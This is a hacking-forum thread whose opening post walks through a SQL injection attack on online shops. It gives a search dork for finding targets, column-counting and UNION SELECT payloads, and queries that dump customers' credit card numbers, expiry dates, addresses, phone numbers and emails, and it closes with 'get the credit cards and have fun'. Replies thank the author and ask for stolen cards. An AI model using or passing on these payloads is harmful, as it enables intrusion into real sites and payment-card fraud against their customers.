Webshop Hacking

Discussion in 'Hacking Tutorials' started by Administrator, May 3, 2017.

  1. Administrator

    Administrator Administrator

    Joined:
    May 1, 2017
    Messages:
    65
    Webshop Hacking
    1) we got to search google for webshops , I used this dork :


    CODE:
    inurl:customer_testimonials.php testimonial_id=
    2)lets say we got this site
    CODE:
    http://www.JustExample.com/customer_...stimonial_id=7
    3) we got to check if its vulnerable to SQLi , we add this
    CODE:
    '
    to url :


    >>>
    CODE:
    http://www.JustExample.com/customer_...stimonial_id=7'
    if we get a error means website its vuln.


    4) we have to check for column number we try with 10 first
    CODE:
    +order+by+10-


    - :


    >>>




    CODE:
    http://www.JustExample.com/customer_...+order+by+10--






    if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns


    5 )this time we get a error now we try from 1 to 9




    CODE:
    +union+select+1,2,3,4,5,6,7,8,9--




    >>>




    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--




    now we found it the website has 9 columns


    6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :


    *- database user


    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--


    *- database name


    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--


    *- database version


    CODE:
    http://www.JustExample.com/customer_...,4,5,6,7,8,9--


    7) we need the table names we add this to url :


    CODE:
    +union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--






    CODE:
    http://www.JustExample.com/customer_...chema.tables--




    8 ) now we need columns : we add this to url :




    CODE:
    +union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--


    >>>


    CODE:
    http://www.JustExample.com/customer_...hema.columns--
    9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......




    CODE:
    +union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--




    >>>




    CODE:
    http://www.JustExample.com/customer_...+from+orders--




    if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them




    CODE:
    +union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+




    >>>




    CODE:
    http://www.JustExample.com
    /customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+




    now one step left


    10 ) get the credit cards and have fun
     
    samtek and Terry132 like this.
  2. Terry132

    Terry132 New Member

    Joined:
    Apr 23, 2018
    Messages:
    8
    Thanks
     
  3. Crack7

    Crack7 New Member

    Joined:
    Apr 27, 2018
    Messages:
    5
    I want contact you ! How I can contact you ?
     
  4. Arayan

    Arayan New Member

    Joined:
    Aug 1, 2018
    Messages:
    2
    I want your help plzz give me high balance cc
     
  5. Iwantlif3

    Iwantlif3 New Member

    Joined:
    Aug 11, 2018
    Messages:
    4
    You are the best, thanks.
     

Share This Page